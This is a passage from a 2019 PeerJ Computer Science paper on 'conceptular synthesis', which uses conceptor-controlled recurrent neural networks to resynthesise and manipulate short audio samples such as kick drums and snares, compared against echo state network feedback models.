d’Inverno, 2018; Khunarsal, Lursinsap & Raicharoen, 2013). For the purpose of audio signal comparison, MFCCs were calculated from a 2048 point windowed FFT. The sounds being analysed were short (typically between 200 and 5000 samples); in order to capture the detail of the timbral envelope at all stages, a short 64 sample hop-size was used. The FFT results from each window were used to calculate 20 MFCCs. The first MFCC coefficient from each window was discarded as it does not give information about timbre (Jensen et al., 2009). The remaining coefficients from each window were appended to create a single feature vector. The feature vectors from two sounds were compared using NRMSE to arrive at an error value that reflects the similarity between the two sounds. This will be referred to as the MFCC error, with lower values indicating higher similarity. Where relevant, waveforms and spectrograms are displayed for visual comparison, and audio is included in the dataset accompanying this paper. CONCEPTULAR SYNTHESIS Conceptular synthesis is a new sound synthesis method based on CCRNNs, and expanding on an established method of sound synthesis, granular synthesis. In granular synthesis, sound is broken into small parts (grains), which are recombined in varying ways to produce new sounds. The theoretical roots of this method lie in Gabor’s (1947) theory of acoustic quanta, and in the compositional theory of Xenakis (1971). Digital implementations of the technique were developed by Roads (1978) and Truax (1986). Granular synthesis offers methods for further sound manipulation techniques including timestretching (Truax, 1994) and corpus-based concatenative synthesis (Schwarz, 2006). Jaeger’s demonstration of the ability of CCRNNs to be trained to generate arbitrary sequences suggests that they could become powerful sound synthesis tools, as they can theoretically reproduce arbitrary audio waveforms. However they are pragmatically limited to playing relatively short sequences; the reason for this is that the computational complexity of the model increases with ψ, and the desired size of ψ increases with the length of training sequences. However, if a model is trained to reproduce a set of shorter sound sequences, then granular synthesis techniques can be used to recombine these sequences to produce longer sounds. Conceptular synthesis therefore expands upon granular synthesis, by dynamically generating grains using conceptors rather than replaying grains from sound sample data. Grain patterns are stored in an RNN, and conceptors force the RNN to replay specific grains. A granular synthesis-style control mechanism is used to switch conceptors so that the model generates a sequence of short signals, which are combined into a longer waveform. The use of dynamic models instead of static sample data broadens the sonic potential of conceptular synthesis in comparison to classical granular synthesis, as the models provide further possibilities for creative manipulation. This section begins by describing conceptular synthesis techniques in detail, illustrated by an example demonstrating resynthesis of a kick drum sample. Resynthesis quality is Kiefer (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.205 8/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.205 then explored in an experiment comparing conceptular synthesis to a baseline method using feedback induced oscillation. Following this, extended sound synthesis options are described. Conceptular synthesis techniques Conceptular synthesis works by subdividing the audio training data into a set of sub- sequences, and learning an RNN and set of conceptors that can regenerate these sub- sequences, with the intention of resynthesising the audio sample by recombining the model-generated sequences. The audio training data may be a single audio sample, or it may be composed of multiple audio samples to create a model that will create variation between different samples. Slicing training data Two methods of slicing the audio were explored: using constant or variable values for the sub-sequence size µ. Using constant µ, the sample is divided into a set of equal length signals a, of length µ samples each. The optimal value of µ for a particular sound sample can be determined programmatically through a grid search. The constant µ slicing method runs into problems, particularly when there are dominant frequencies in the source audio whose wavelength is longer than µ. Slicing lower frequency waveforms at non-zero points creates high-frequency artefacts in the training data, which can distort the training process because these artefacts are not present in the original training material. For example, consider the kick drum waveform in Fig. 2. The sample has low frequency components with varying long wavelengths, and there is no constant value of µ that will avoid slicing at non-zero points. To avoid this, the sample can be analysed using a zero-crossing detector, resulting in a set of points i at which the sample is sliced to create a set of driving audio signals a. i={n|y(n) > 0∧y(n+1)<0}. (13) Hyperparameters and training A key parameter is the reservoir size ψ.ψ correlates with the memory capacity of the reservoir; it should be at least equal to the number of independent variables needed for the task the model is being trained for (Jaeger, 2002). As we increase the quantity and length of training signals, we need to increase ψ to give the model the capacity to learn them. However increasing ψ makes computation more expensive (at approximately O(N 2)), so there are practical limits to this value. The other key parameter is the leak rate α. Lowering α has the effect of filtering out high frequencies in the reservoir activation levels x, and therefore slowing down the behaviour of the RNN. α needs to be chosen such that the model can reproduce the frequency content from the source audio, for example a sound with dominant low frequencies like the kick drum in Fig. 2 will need a network with slowly changing activations, and therefore a low α value. Optimal values can be found using a grid search. After choosing hyperparameters, a model is trained using the techniques set out earlier in the paper. The output is a set of conceptors, calculated to reproduce each audio signal aj. Kiefer (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.205 9/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.205 0 1000 2000 3000 4000 5000 Time (samples) 0.8 0.6 0.4 0.2 0.0 0.2 0.4 Am pl itu de Original Reconstruction Figure 2 A comparison of the original kick drum sample and the output of the trained CCRNN model. Full-size DOI: 10.7717/peerjcs.205/fig-2 Table 1 Hyperparameters in the resynthesis quality experiment. Model Type ψ α γW γinput γbias λ %W %out CCRNN 900 {0.05, 0.15...0.95} 1.5 1.2 0.3 50 1e−5 1e−5 ESNSPF 20...900 0...1 1.0 0...1 0...1 50 1e−5 1e−5 Resynthesis To resynthesise the training signal, the CCRNN is initially run for λ steps with the first conceptor C0. The model is then run with each conceptor Cj inserted into the update loop, as described in Eqs. (10) and (11), to create a set of output signals q. The number of samples for which each conceptor is used in the runtime loop corresponds with the length of the audio signal from which the conceptor was trained. The algorithm makes a short linear crossfade between conceptors, over a small percentage of the pattern length. This prevents artefacts appearing from instantaneous switching of conceptors. Finally, output signals are appended to create the waveform k=[q0|q1|...|qn]. Example: resynthesis of kick drum The output of a trained conceptular synthesis model is now shown, to illustrate how this technique can be applied. A CCRNN model was trained to resynthesise a kick drum. The original audio (see Fig. 2 and Audio S5) was re-sampled at 22050 Hz (half of CD-quality), in order to reduce the CPU load of training. The sample was segmented using the zero-crossing method, and the model was trained with the parameters as shown in Table 1, with leak rate α=0.15 . The kick drum sample was resynthesised with the crossfade length set at 5% of signal length. The result is shown in Figs. 2 and 3, and included in Audio S7. Both show a close reconstruction of the original, with the addition of some high frequency artefacts. This example is not compared quantitatively to the original, instead this is done systematically in the experiment below. Measuring resynthesis quality We have seen the potential capabilities for conceptular synthesis to resynthesise audio from trained CCRNN models. These trained models offer extensive creative possibilities for sound synthesis, which are detailed later in the paper. Before exploring these avenues, the quality of resynthesis method should be evaluated, in comparison to an existing baseline. Kiefer (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.205 10/24 https://peerj.com https://doi.org/10.7717/peerjcs.205/fig-2 http://dx.doi.org/10.7717/peerj-cs.205#supp-5 http://dx.doi.org/10.7717/peerj-cs.205#supp-7 http://dx.doi.org/10.7717/peerj-cs.205 [A] [B] Figure 3 Spectrograms comparing the resynthesised kick drum (A) to the original sample (B). Full-size DOI: 10.7717/peerjcs.205/fig-3 Baseline models: echo state networks with stored patterns and feedback The closest comparable method to conceptular synthesis is to use ESNs with output feedback as trainable oscillators. Feedback is used to guide reservoir dynamics to a stable limit cycle where the model is outputing a desired signal. Early research on ESNs (Jaeger, 2010) showed their capability for self-driven oscillation using output feedback. More recent research has focused on increasing the effectiveness of output feedback by adapting the weight matrix W to increase the accuracy of reproduced patterns. Jaeger (2014a) p2 summarises this family of techniques including self-prediction (Mayer & Browne, 2004), self-sensing networks (Sussillo & Abbott, 2012) and Jaeger’s own method for storing patterns which has already been detailed in this paper. The reservoirs for both techniques are created using the same stored pattern method, but then the methods diverge. These baseline models will be referred to as ESNSPFs. The training method for ESNSPFs works as follows: a set of audio signals is stored in an RNN, using an identical approach as detailed earlier with Eqs. (1), (2) and (4). The result of this process is to adapt the randomly initialised weight matrix W∗ to trained matrix W . This model is now used for training a set of output weight matrices, such that each matrix W out j will be used to recreate audio signal aj. To train an ESNSPF using output feedback, we train an output layer that will predict the the next sample from the input signal. The model is driven with signal aj using Eqs. (1) and (2). Following a washout period, states x(n) from timesteps λ to λ+φ−2 to are stored in ψxφ−1 matrix X. Samples from the audio signal aj from λ+1 to λ+φ−1 are stored in 1 x φ−1 matrix P. The output weight matrix W out j can then be calculated using Eq. (5). Feedback models are sensitive to initial conditions; a brute force search can be used to find a good value for the initial state x(0), stored to use later as xcue. Kiefer (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.205 11/24 https://peerj.com https://doi.org/10.7717/peerjcs.205/fig-3 http://dx.doi.org/10.7717/peerj-cs.205 At runtime, the model is run by feeding the output back into the input with a modification of Eq. (1), starting from initial state xcue. To reproduce audio signal aj, the model is updated as follows: z(n+1)=Wx(n)+W iny(n) (14) x(n+1)=(1−α)x(n)+αtanh(z(n+1)+b) (14) y(n+1)=W out j x(n+1) (14) To recreate a sequence of patterns or grains that comprise a longer audio signal, each output matrix W out j is sequentially inserted to the runtime loop for a period matching the length of the audio signal aj. Dataset Sounds from the Ixi Lang data set (Magnusson & Kiefer, 2019) were used to compare the two methods. This is a collection of the sounds that accompanies the Ixi Lang live coding environment. The collection represents a wide variety of short samples that are used for live performance. There are 127 audio clips, lasting between 5ms and 36.3s (mean: 1.75s). Method Each sample was resampled at 22,050 Hz, normalised and scaled by half, and truncated to a maximum of 5,000 samples (or 0.23s); this was to create a balance between computation demands on the model, and providing enough material to make a useful comparison. The sample was then sliced; the zero-crossing method (Eq. (13)) was used as this is more widely applicable to a range of timbres. A maximum of 150 patterns were kept from the slicing process, again to reduce demands on computation time and memory for storing conceptors. This process resulted in a set of patterns extracted from each sample in the dataset. ESNSPF and CCRNN models were trained to resynthesise each pattern set, and then used to resynthesise the corresponding samples. Table 1 shows the hyperparameters used for both models types, chosen to match the models as fairly as possible for comparison. Some were fixed, others were searched for within the ranges shown. Fixed hyperparameters were chosen based on experimental reports in wider literature (Lukoševičius, 2012; Jaeger, 2005; Jaeger, 2014b), and through extensive manual experimentation. Some parameters were deemed to be sensitive to the training material, for example α needs to be tuned to match the frequencies in the source, in which case the values were optimised through automatic search as detailed below. The use of randomly determined weight values is fundamental to the design of both models, however this leads to variance in training results. To mitigate against this variance, the training process was run multiple times at each hyperparameter setting and the best models chosen. It is acknowledged that, as with all non-deterministically generated models, it is possible that the most optimal model will not be found, but running the training process multiple times will increase the possibility of finding a better model. Further to this, variances in this process will be averaged out across the 127 samples in the dataset. Kiefer (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.205 12/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.205 CCRNN Models The key hyperparameter for this model type was the leak rate α, which needed to be tuned to match the frequency response of the model with the frequencies needed for resynthesis of the training material. For each sample in the dataset, α was determined through a grid search (as recommended in (Lukoševičius, 2012, section 3.3.4)) of values {0.05,0.15,0.25...0.95}. The grid search evaluated models at each of these settings at a lower model size ( ψ=600) in order to save computation time, evaluating 5 different models and recording the best MFCC error. This process resulted in an optimal value of α which was used to evaluate 10 models at a higher model size ( ψ=900). The highest score of these models was recorded. ESNSPF Models Models trained with output feedback showed sensitivity to four parameters: model size ψ, leak rate α, bias scaling γbias and input scaling γ input . Interestingly, this technique showed sensitivity to ψ, while CCRNN models show consistent improvement with larger ψ. A four-dimensional grid search was impractical due to computational demands, instead a microbial genetic algorithm (Harvey, 2009) was used to find optimal values, conducting a stochastic evolutionary search of parameters in the ranges shown in Table 1. The fitness function selected the best model based on evaluations of 10 models created with identical hyperparameters. Each model was then evaluated with 10 randomised starting states xcue, and the xcue with the lowest error was chosen. Results The experiment resulted in an error score for each model type for each of the 127 samples in the dataset. The two methods gave comparable results (Fig. 4) (CCRNN: mean 0.542, median 0.482, ESNSPF: mean 0.568, median 0.536). There was no significant difference between the model types (wilcoxon signed rank test: W =3872,p=0 .644). These results are discussed further below, after contextualisation within extended synthesis techniques. Extended conceptular synthesis techniques The above experiment demonstrates that CCRNN models are capable of sound synthesis quality comparable to ESNSPFs. Moving beyond this baseline, they offer a wider range of creative sound synthesis possibilities. Extended sound synthesis parameters The sound generation algorithm can be manipulated with three key parameters: speed, leak rate scale, and weight scaling. The speed parameter changes the amount of time in which the algorithm waits until a new conceptor is plugged in to the RNN update loop. For example, a speed of 0.5 results in two cycles of a pattern being played for each conceptor Cj and resulting in a rendered sample that is twice the length of the original. At negative speeds, a sample can be crudely reversed by playing the patterns in reverse sequence. This parameter can have the effect of timestretching, i.e., extending or compressing the length of a sound, independent from its pitch. Audio S8 presents an example of timestretching from 50% up to 800% in 50% steps with a CCRNN model trained on a kick drum sample. Kiefer (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.205 13/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.205#supp-8 http://dx.doi.org/10.7717/peerj-cs.205 0.0 0.2 0.4 0.6 0.8 1.0 1.2 MFCC Error CCRNN ESNSPF M od el Figure 4 A violin plot of MFCC error scores for each model type, for resynthesis of samples in the Ixi Lang dataset. The plot shows the distribution of scores, with real values marked by vertical lines. Full-size DOI: 10.7717/peerjcs.205/fig-4 The leak rate α can be scaled during resynthesis, by updating Eq. (2) as follows: α scaled =αξ α (15) x(n+1)=(1−αscaled)xtarget (n)+αscaledtanh(xtarget (n+1)+b) (15) ξα becomes an useful parameter in resynthesis for control over timbre and pitch (which is explained later when discussing pitch-controlled oscillators). It should be limited such that α stays between 0 and 1. Weight scaling can be introduced by updating Eq. (1) so that the weight matrix is linearly scaled by scalar ξW : W scaled =WξW (16) z(n+1)=W scaledx(n)+W ina(n+1) (16) This causes timbral changes in the rendered sample whose characteristics are based on the random make up of the RNN. There is some consistency in this parameter in that when raised, more high frequency content tends to be introduced. At higher values, the RNN can behave in musically interesting non-linear ways. Below a lower limit (model dependent), the model output tends towards silence. Further manipulations of sound can be achieved by manipulating conceptors. Extending sound synthesis with conceptor logic The use of conceptor logic and conceptor manipulation is where this mode of sound synthesis significantly moves on from standard granular synthesis features, and brings its own unique possibilities. New conceptors can be created using boolean logic rules; Jaeger (2014b, p.52) defines formulae for AND, OR and NOT operations. Boolean operations provide a system of logic with which to combine conceptors, with applications in classification and memory management. In the case of conceptular synthesis, logic operations provide a wide range of creative possibilities. Conceptors can be logically recombined to create new timbral variations. Two examples are now given: Kiefer (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.205 14/24 https://peerj.com https://doi.org/10.7717/peerjcs.205/fig-4 http://dx.doi.org/10.7717/peerj-cs.205 0 200 400 600 800 1000 1200 1400 Time (samples) 0.6 0.4 0.2 0.0 0.2 0.4 0.6 0.8 Am pl itu de Original Resynthesis Figure 5 The waveform of a variant of a snare sample, produced using boolean logic Cj2 = C j ∨ Cj+1 ∨ Cj+2 ∨Cj+3. Full-size DOI: 10.7717/peerjcs.205/fig-5 0 200 400 600 800 1000 1200 1400 Time (samples) 0.3 0.2 0.1 0.0 0.1 0.2 0.3 A m pl itu de Figure 6 Waveforms showing generative variants of the snare sample, using the boolean logic rule Cj3 = C j ∨Crandom1 ∨Crandom2. Full-size DOI: 10.7717/peerjcs.205/fig-6 Example 1 A CCRNN model was trained to reproduce a snare sample (Audio S1). Each conceptor in the snare model Cj was combined with the subsequent three conceptors to make a new set C2, using the rule C j 2 =C j ∨Cj+1∨Cj+2∨Cj+3 This resulted in a variant on the original snare sound shown in Fig. 5 (Audio S9). Example 2 A new set of conceptors C3 was made by combining each conceptor in the set with a random choice of two other conceptors in the set Cj3 =C j ∨Crandom1∨Crandom2. This is designed with the intention of keeping the main structure of the sample but introducing random variations. Fig. 6 shows the resulting waveforms from 4 separate iterations of this process using the snare model detailed above (Audio S10). In both these examples, the variations are subtle, and the renderings suffer from some audible artefacts, however this does point to generative possibilities that are worthy of further research. Sound morphing with interpolated conceptors Jaeger (2014b) p.42 demonstrated shape morphing between heterogeneous patterns using conceptors. This same technique can be applied within conceptular synthesis to morph between sounds. It is not within the scope of this paper to analyse the quality of sound morphing using conceptular synthesis in comparison to other techniques, rather just to demonstrate that sound morphing is a creative possibility with CCRNNs, and to outline how it can be achieved. Kiefer (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.205 15/24 https://peerj.com https://doi.org/10.7717/peerjcs.205/fig-5 https://doi.org/10.7717/peerjcs.205/fig-6 http://dx.doi.org/10.7717/peerj-cs.205#supp-1 http://dx.doi.org/10.7717/peerj-cs.205#supp-9 http://dx.doi.org/10.7717/peerj-cs.205#supp-10 http://dx.doi.org/10.7717/peerj-cs.205 Morphing can be implemented by creating a linear combination of conceptors to interpolate between the two patterns the conceptors were trained to recreate. Equation (17) shows how this can be done with two conceptors, where ω is the morphing factor. x(n+1)=((1−ω)Ci+ωCj)tanh(Wx(n)+b) (17) Varying ω between 0 and 1 forces the RNN to create a morph between the patterns represented by the two conceptors. When 0≤ω≤1, the mix of conceptors will interpolate between patterns. However, when ω is outside of this range, the mix of conceptors can extrapolate between patterns. The intention of morphing between sounds is to create a new mixture of sounds that retains the shared perceptual properties of the original sources (Slaney, Covell & Lassiter, 1996). Morphing was investigated with conceptular synthesis by training a CCRNN recreate patterns from two different samples: the snare sample already discussed, and a short bongo sample (Audio S12). An 800-node network was trained for recreation of 100 individual patterns (fixed length 15) for each sample, resulting in two sets of conceptors, Csnare and Cbongo. Morphing was achieved by creating a new set of conceptors based on a linear mixture of the trained conceptors, for each pattern segment. The results demonstrate a morph between samples that is different from a linear mixture of the two samples. Figure S1 shows how the time-domain waveform result varies over an 11 point morph from ω=0 to ω=1, and the result can be heard in Audio S3. For comparison, Fig. S2 and Audio S4 demonstrate a linear mix between amplitude values with the same two samples. Boolean conceptor logic can also be used for sound morphing. For example, a set of conceptors CbongoSnare was created, with each element combining elements from the snare and the bongo CjbongoSnare =C j bongo∨C j snare. A sample rendered with this conceptor set contains characteristics of both sounds (Audio S11). Equivalent techniques with ESNSPF models Where possible, equivalent extended sound manipulation techniques were attempted with ESNSPF models. There is no parallel using ESNSPF models for conceptor logic. However, it is possible to manipulate ξα and ξW during resynthesis, and also to introduce the same timestretching mechanism as for CCRNN models. Attempts at all of these methods however did not lead to satisfactory results. Timestretching with ESNSPFs only works when slowing down playback at integer subdivisions of the original speed. At other ratios, the models tend to quickly converge to silence. When altering ξα and ξW , the models tend towards producing high-amplitude artefacts. To demonstrate this, all models trained in the experiment above were tested with either ξα or ξW set to values {0.7,0.75...1.3}. Figure 7 shows the average percentage change in standard deviation of amplitudes of resynthesised waveforms compared to a waveforms generated with ξα=1 and ξW =1. For ESNSPFs, this change in standard deviation is high compared to the same measurement for conceptular synthesis models, reflecting high amplitude artefacts introduced by the change in these values. CCRNN models however remain close to the original amplitude range (although with some very small variation). Kiefer (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.205 16/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.205#supp-12 http://dx.doi.org/10.7717/peerj-cs.205#supp-13 http://dx.doi.org/10.7717/peerj-cs.205#supp-13 http://dx.doi.org/10.7717/peerj-cs.205#supp-3 http://dx.doi.org/10.7717/peerj-cs.205#supp-14 http://dx.doi.org/10.7717/peerj-cs.205#supp-4 http://dx.doi.org/10.7717/peerj-cs.205#supp-11 http://dx.doi.org/10.7717/peerj-cs.205 0.70 0.75 0.80 0.85 0.90 0.95 1.00 1.05 1.10 1.15 1.20 1.25 1.30 scaleW / scaleα 100 101 102 % ch an g e in σ feedback models, scaleα feedback models, scaleW conceptor models, scaleα conceptor models, scaleW Figure 7 Demonstration of the effects of ξα and ξW on waveform amplitude, reflecting high-amplitude artefacts in the ESNSPF models. Full-size DOI: 10.7717/peerjcs.205/fig-7 Discussion This work demonstrates how CCRNNs can be used to resynthesise short samples by dividing the sample up into short signals and training a conceptor for the reproduction of each one. An experiment on resynthesising the Ixi Lang dataset show that conceptular synthesis can achieve comparable resynthesis quality to echo state network models that use stored patterns and feedback, when measured using MFCCs. Both types of model could not perfectly reproduce the training samples, but were able to make reasonable reconstructions. There was some variance in resynthesis quality across the results, the causes of which are the topic of future investigation. CCRNN models offer malleable sound synthesis possibilities when manipulated using inherent runtime parameters and through conceptor combinations created either by interpolation or by boolean logic. These techniques provide unsatisfactory results when attempted with equivalent implementations in ESNSPF models. This is likely to be due to the high sensitivity to initial conditions of models that use output feedback. While they can provide good quality resynthesis, ESNSPF models are brittle in nature, while CCRNNs show themselves to be highly robust to manipulation during resynthesis, making them extremely valuable as creative tools. There is natural variability between models, due to random initialisation of the RNN. This variability is minimised when using the network within normal constraints, however when pushed into non-linear modes of behaviour by, for example, changing the value of ξW , a higher variability between different CCRNNs can be observed. This behaviour for a particular network may turn out to be musically interesting, lending conceptular synthesis potential for serendipitous discovery of new sounds, and a level of generative unpredictability that is often valued by musicians (McCormack et al., 2009). Is it possible that, by using the reconstruction error as the evaluation metric, this experiment has produced models that are flawed because of overfitting? In this context, overfitting would be the production of generative models that are only useful for reproducing the training data, but do not function well as malleable creative tools when manipulated using the techniques described above, ie. they would have a limited aesthetic state space (Eldridge, 2015). Conventionally in ESN research, the complexity of reservoirs, approximately determined by the size of N , has been established as a factor in overfitting in discriminative models (Wyffels & Schrauwen, 2010); however, there is very little research on the nature of overfitting in generative ESNs and related models, especially with regards Kiefer (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.205 17/24 https://peerj.com https://doi.org/10.7717/peerjcs.205/fig-7 http://dx.doi.org/10.7717/peerj-cs.205 to creating malleable models. Jaeger acknowledges that there are open questions around the concept of overfitting (Jaeger, 2005). The experimental results do not indicate that N is a factor in overfitting in this experiment. In the search for ESNSPF models, N was optimised through evolutionary search. The resulting values of N follow an approximately flat distribution across the search range (mean 379, std: 256). If higher N resulted in higher scoring (but overfitted) models, these values would have been skewed towards larger model sizes. Further investigation revealed no significant correlation between N and reconstruction error. The measurement of high amplitude artefacts produced by manipulation of ξα and ξW (as detailed above) could be taken as a metric for basic malleability. There was no significant correlation between N and the level of artefacts, overall showing a lack of evidence for a connection between N and the possible effects of overfitting in ESNSPFs. CCRNN models were produced with a fixed N , and have shown themselves to be highly malleable in the examples detailed in this project. When producing generative reservoir models, increasing N could give the model more opportunity for varied dynamical behaviours rather than limiting scope; it’s certain that overfitting in generative reservoir models is a nebulous concept that warrants future attention. An audio synthesis process would ideally run in realtime. In this example, the rendering was carried out on a CPU, and was around 10 times slower than realtime. While this leaves much room for improvement, it should be noted that this version was not optimised for speed, and a dedicated C++ or GPU renderer is expected to be faster than the python version used here. It does however show the scale of computation involved in this method of sound synthesis, and indicates that computational resources are a challenge in this area. CONCLUSIONS AND FUTURE WORK The experiments presented here show how recurrent neural networks under conceptor control, as originally described in (Jaeger, 2014b), can be configured, trained and run as sample-level sound synthesisers. Conceptular synthesis is an extension of granular synthesis, where a CCRNN is trained to reproduce very short segments of a sound sample using conceptors to recall the different patterns. It is controlled at runtime to recombine these short segments into a longer continuous sound. The models were not limited to straight- forward sound reproduction; CCRNNs presented a large variety of creative options for synthesising new sounds based on the training materials. Techniques included classic granular synthesis methods: timestretching and compression, and creative recombination of grains. Techniques were extended by the new possibilities of combining conceptors, using boolean conceptor logic, and using linear combinations of conceptors to morph between signals. The leak rate of RNN nodes and the RNN spectral radius can be manipulated at runtime to create new sonic possibilities. CCRNNs were shown to have similar resynthesis quality to baseline ESNSPF models, when compared using MFCCs. CCRNNs however excelled in their possibilities for creative sound manipulation, compared to ESNSPFs which produced either significant artefacts or silence when manipulated. The experiments outlined common limitations of CCRNN models for sound synthesis. There was always some high-frequency loss in the reproduction of the original driving Kiefer (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.205 18/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.205 audio signals, some further experimentation is needed to discover the source of this issue. Issues with high frequencies are affected by the choice of leak rate α, which needs to be chosen carefully to slow down RNN dynamics for reproduction of low frequency patterns, while also preserving enough high-frequency dynamics. It’s possible that oversampling may help, although the efficiency impact of oversampling could be significant considering the high computational cost of training and running these models. This work helps to answer the questions posed at the beginning of the paper concerning the fundamental capability of conceptors to synthesise audio signals. Conceptors are able to generate longer patterns needed for audio signals at reasonable sample rates, as demonstrated by resynthesis of simple sine-like patterns up to 890 samples long in the example of the kick drum, and resynthesis of varied audio materials in the Ixi Lang dataset. These pattern lengths are relatively short but useful enough for sound synthesis. As pattern lengths extend, pragmatic limits on computational resources limit further exploration. The resynthesis quality experiment established that when training models with multi-timbre sounds, there is variance in the ability of CCRNN models to reproduce these sounds accurately, indicating sensitivity in CCRNNs to sonic qualities in the source materials. It’s not clear yet what this relationship is; this should be the topic of further investigations. Conceptular synthesis required large models (of approximately 800 nodes upwards) to produce reasonable results, resulting in slow resynthesis times. The large size of these models was required for them to be able to learn either long patterns or high volumes or short patterns. The technique ran at around 10 times slower than realtime. The memory requirements for conceptular synthesis were particularly large, as a conceptor was needed to reproduce each training signal, resulting in model sizes between 0.5 and 1 GB in the experiments above. These computation requirements still may be considered lightweight compared to some deep learning sound-synthesis techniques, nevertheless it would be a considerable success if these models could be optimised to reach realtime at reasonable sample rates. Recent research into deep architectures in echo state networks may offer promise for increasing computational efficiency, as they have been shown to have better memory capacity compared to classical ESNs with similar numbers of nodes (Gallicchio, Micheli & Silvestri, 2018). More broadly, the relationship between memory capacity and computation time will be a limit on sound synthesis with CCRNNS and their potential to move beyond short sound samples, until methods are found to change architectures and reduce this dependency. This initial demonstration of the potential of sound synthesis with CCRNNs stimulates further questions. Future research should establish: 1. how these techniques can be scaled upwards to facilitate learning models of longer sound samples; 2. the causes of variance in resynthesis quality when training models with signals of varied timbre; 3. whether high-frequency loss in resynthesis can be resolved; 4. how to optimise the RNN leak rate α for sounds with wide frequency ranges; 5. how the techniques identified in this paper can be extended for the purpose of generative sound synthesis; Kiefer (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.205 19/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.205 6. how to optimise network architectures to achieve closer-to-realtime performance; 7. how to conceptualise overfitting, in the context of producing creatively malleable generative models; 8. potential for use with analysis and resynthesis in the spectral domain (as we are seeing with systems such as NSynth (Engel et al., 2017), GANSynth (Engel et al., 2019)). Conceptually, CCRNN architectures could be creatively compelling for computer musicians; it can sometimes be challenging to create believable and coherent complexity with standard digital sound generation and editing tools. With CCRNNs, complexity comes for free and needs to be managed instead of created. The models presented here are inherently variable, and can be easily encouraged towards unpredictability and nonlinearity, creating sometimes surprising and serendipitous results. The models offer plenty of entry points for creative manipulation, with a potentially wide aesthetic state space (Eldridge, 2015). The musician must interact with these models, rather than control them. The experiments presented here have mapped out initial explorations into sound synthesis with CCRNNs. They extend a classical sound synthesis method, bringing boolean logic, pattern morphing and non-linear modulation possibilities into granular-style synthesis. The techniques exhibit some limitations that require further investigation, but also show unique creative possibilities for musicians, and rich potential for further research in this area. ACKNOWLEDGEMENTS Thank you to Sussex Humanities Lab for generous access of their computing facilities. ADDITIONAL INFORMATION AND DECLARATIONS Funding The author received no funding for this work. Competing Interests The author declares there are no competing interests. Author Contributions • Chris Kiefer conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. Data Availability The following information was supplied regarding data availability: Code is available at GitHub: https://github.com/chriskiefer/conceptorSoundSynthesis https://github.com/chriskiefer/conceptularBeatSynth. Kiefer (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.205 20/24 https://peerj.com https://github.com/chriskiefer/conceptorSoundSynthesis https://github.com/chriskiefer/conceptularBeatSynth http://dx.doi.org/10.7717/peerj-cs.205 Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.205#supplemental-information. REFERENCES Donahue C, McAuley J, Puckette M. 2018. Synthesizing audio with generative adversarial networks. ArXiv preprint. arXiv:1802.04208. Duport F, Smerieri A, Akrout A, Haelterman M, Massar S. 2016. Fully analogue photonic reservoir computer. Scientific Reports 6:22381 DOI 10.1038/srep22381. Eldridge A. 2015. You pretty little flocker: exploring the aesthetic state space of creative ecosystems. Artificial Life 21(3):289–292 DOI 10.1162/ARTL_a_00169. Engel J, Agrawal KK, Chen S, Gulrajani I, Donahue C, Roberts A. 2019. Gansynth: adversarial neural audio synthesis. ArXiv preprint. arXiv:1902.08710. Engel J, Resnick C, Roberts A, Dieleman S, Eck D, Simonyan K, Norouzi M. 2017. Neural audio synthesis of musical notes with WaveNet autoencoders. ArXiv preprint. arXiv:1704.01279. Fernando C, Sojakka S. 2003. Pattern recognition in a bucket. In: European conference on artificial life. Berlin, Heidelberg: Springer, 588–597. Fiebrink R. 2011. Real-time human interaction with supervised learning algorithms for music composition and performance. PhD thesis, Princeton University. Gabor D. 1947. Acoustical quanta and the theory of hearing. Nature 159(4044):591–594 DOI 10.1038/159591a0. Gallicchio C, Micheli A, Silvestri L. 2018. Local lyapunov exponents of deep echo state networks. Neurocomputing 298:34–45 DOI 10.1016/j.neucom.2017.11.073. Gast R, Faion P, Standvoss K, Suckro A, Lewis B, Pipa G. 2017. Encoding and decoding dynamic sensory signals with recurrent neural networks: an application of concep- tors to birdsongs. bioRxiv 131052. Ghedini F, Pachet F, Roy P. 2016. Creating music and texts with flow machines. In: Multidisciplinary contributions to the science of creative thinking. Singapore: Springer, 325–343. Hamel P, Eck D. 2010. Learning features from music audio with deep belief networks. In: Proceedings of the International Society of Music Information Retrieval, vol. 10. The Netherlands: Utrecht, 339–344. Harvey I. 2009. The microbial genetic algorithm. In: European conference on artificial life. Berlin: Springer, 126–133. Holzmann G. 2009a. Echo state networks with filter neurons and a delay and sum readout. Neural Networks 2(23):244–256. Holzmann G. 2009b. Reservoir computing: a powerful black-box framework for nonlinear audio processing. In: DAFx. Ianigro SC, Bown O. 2018. Exploring continuous time recurrent neural networks through novelty search. In: Luke Dahl, Douglas Bowman TM, eds. Proceedings of the international conference on new interfaces for musical expression. Blacksburg: Virginia Tech, 108–113. Kiefer (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.205 21/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.205#supplemental-information http://dx.doi.org/10.7717/peerj-cs.205#supplemental-information http://arXiv.org/abs/1802.04208 http://dx.doi.org/10.1038/srep22381 http://dx.doi.org/10.1162/ARTL_a_00169 http://arXiv.org/abs/1902.08710 http://arXiv.org/abs/1704.01279 http://dx.doi.org/10.1038/159591a0 